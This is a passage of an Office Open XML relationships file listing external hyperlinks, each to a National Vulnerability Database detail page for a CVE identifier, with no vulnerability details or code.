Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86770" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87633" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12858" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54606" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55108" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55526" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77974" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87023" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87030" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-12737" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20501" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20502" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52491" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55581" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55582" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63388" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71612" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71614" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77118" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82563" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86502" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86741" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87794" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87811" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87813" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87815" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29988" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38820" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45730" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48105" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48106" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53507" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82404" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85091" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86750" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86771" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87034" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87479" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87480" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87481" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87487" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87506" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87510" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87524" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87553" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87572" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87578" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87582" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87604" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87616" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87618" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87628" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87639" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87644" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87648" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12855" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24262" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24263" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44506" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47626" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53761" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53938" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54556" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55528" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55533" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55571" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63135" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63376" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6485" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77358" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78491" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85730" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86145" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86251" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86297" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18147" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32257" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32258" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50979" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53580" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55065" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55228" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64679" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65181" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71809" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73334" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75464" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76009" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77317" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77567" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78839" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81891" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81892" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86242" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86479" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87016" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87036" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87075" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87457" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87467" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87471" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87499" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87505" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87509" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87514" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87530" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87533" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87537" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87554" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87606" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87874" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30826" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30890" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31803" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31880" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49832" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52831" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52833" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79755" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44629" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17499" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21087" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21088" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21089" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21090" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21091" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30512" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45200" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49360" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52489" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52492" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54757" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57170" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68508" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71382" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71613" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78136" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78482" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78484" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78493" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86504" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9852" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9853" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9854" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15140" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15913" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34948" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55658" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55864" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57171" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61617" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61792" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77646" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79637" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87084" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87996" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38822" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47666" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53635" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54245" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55532" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77368" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80182" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44319" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51675" TargetMode="External" Id="rId441" /><Relationship 